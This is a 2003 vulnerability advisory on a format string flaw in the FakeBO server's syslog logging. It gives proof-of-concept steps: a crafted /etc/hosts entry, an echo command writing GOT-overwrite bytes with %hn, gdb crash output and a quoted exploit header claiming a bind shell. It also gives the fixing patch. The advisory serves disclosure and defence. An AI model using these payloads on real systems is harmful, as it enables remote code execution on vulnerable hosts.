http://www.secnetops.biz/research
Secure Network Operations, Inc. http://www.secnetops.com
Strategic Reconnaissance Team [EMAIL PROTECTED]
Team Lead Contact [EMAIL PROTECTED]
Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.
Quick Summary:
************************************************************************
Advisory Number : SRT2003-06-12-1212
Product : FakeBO server
Version : <= 0.4.1
Vendor : http://sourceforge.net/projects/fakebo/
Class : Remote
Criticality : Low
Operating System(s) : *nix, cygwin
High Level Explanation
************************************************************************
High Level Description : Remote format string issue in syslogprintf()
What to do : Apply patch or disable syslog in the config
Technical Details
************************************************************************
Proof Of Concept Status : Secure Network Operations does have PoC code
Low Level Description :
FakeBO could be considered a novelty program by now however in some
situations there is potential that it could be used in some sort of
novice honeypot type setup. It is also possible someone would think it
was a good way to trick their office buddy that had installed the REAL BO
on their PC earlier that week. Someone mentioned the possiblilty of this
being used in a crude backdoor as well.
Both cygwin binaries and unix source are available from the FakeBO website
located at http://cvs.linux.hr/fakebo/. This issue can be triggered in
both the linux and win32 versions. In order to be exploitable FakeBO must
first be configured to use syslog() and the target must have the proper
resolver library in place. Syslog could be turned on in the fakebo.conf as
follows.
# you can set this to 1 if you want to log connections via syslog
# 0 - do not log via syslog
# 1 - log via syslog
# 2 - log via syslog verbosely
logtosyslog 1
Due to possible resolver issues the chances of this bug being actively
exploited are slim. The issues with the resolver can be explained at
http://pi.cr.yp.to/ and http://cr.yp.to/djbdns/idn.html. If your bind
allows the allow_special all or options no-check-names in /etc/resolv.conf
you may be able to be exploited. In order to show the posibility for
exploitation you simply use /etc/hosts as an example.
This is the entry in /etc/hosts
127.0.0.1 ..AAAABBBB%10$x%11$x
If we only make use of the console we would see this
04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x'
(127.0.0.1) accepted!
In syslog however we get more interesting output.
Apr 9 15:37:18 vegeta FakeBO:
[NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)
This would be an example of overwriting the syslog() function in order
to exploit this issue.
[EMAIL PROTECTED] dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog
08051cd4 R_386_JUMP_SLOT syslog
[EMAIL PROTECTED] dotslash]# echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c
\x05\x08%10\$hn%11\$hn" > /etc/hosts
(gdb) r -c /tmp/fakebo.conf
Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf
FakeBO version 0.4.1 Copyright (C) 1998,99 by KoSt
Type `~/fakebo-0.4.1/fakebo -a' for details.
04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591.
04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn'
(127.0.0.1) accepted!
04-09-2003 19:48:43 [NB][#0] Client disconnected.
Program received signal SIGSEGV, Segmentation fault.
0x00240024 in ?? ()
If you wanted to take this simple example to the extreme...
[EMAIL PROTECTED] dotslash]$ head 0x82-fakebo_sux.c
/*
** FakeBO v0.4.1 Proof of Concept exploit
** exploit by "you dong-hun"(Xpl017Elz), <[EMAIL PROTECTED]>.
**
** bash-2.04# ./0x82-fakebo_sux -t1
** [1] Make format string code.
** [2] Try localhost NetBUS port.
** [3] Make bind shellcode.
** [+] Waiting, execute shell.
** [*] Executed shell successfully !
**
** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** bash-2.04$
**
*/
When being attacked in syslog you would see the following.
** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996.
** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn'
(127.0.0.1) accepted!
** 05-31-2003 18:49:06 [NB](#0): @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...
If however you were using an Immunix box (http://www.immunix.org) you would
see the following.
[EMAIL PROTECTED] kf]# ./0x82-fakebo_sux -t1
[1] Make format string code.
[2] Try localhost NetBUS port.
[3] Make bind shellcode.
Broken pipe
Note we did not get a shell... that would be FormatGuard working its magic.
fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by
syslogprintf.
Cheers go to the Immunix team for their work on the FormatGuard product.
Patch or Workaround:
Shortly after exploiting this issue on a non Immunix system I looked around
to make sure this had not already been published. It turns out that someone
on the FreeBSD team also noticed this sometime last year and wrote a patch.
Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris
- Fix a format string vulnerability which appears to be exploitable, and
bump PORTREVISION.
--- misc.c.orig Thu Jun 6 18:11:32 2002
+++ misc.c Thu Jun 6 18:11:41 2002
@@ -107,7 +107,7 @@
#ifdef HAVE_OPENLOG
openlog("FakeBO", LOG_CONS, LOG_USER);
- syslog(LOG_WARNING, buf);
+ syslog(LOG_WARNING, "%s", buf);
closelog();
#else
#warning "Can't find usable syslog, disabled!"
Vendor Status : Vlatko Kosturjak aka KoSt was notified about the issue
no updates to the sourceforge site or original home page have been made.
A recompiled cygwin binary is not available from the Author at this time.
Bugtraq URL : to be assigned
------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact [EMAIL PROTECTED] for information on how
to obtain exploit information.
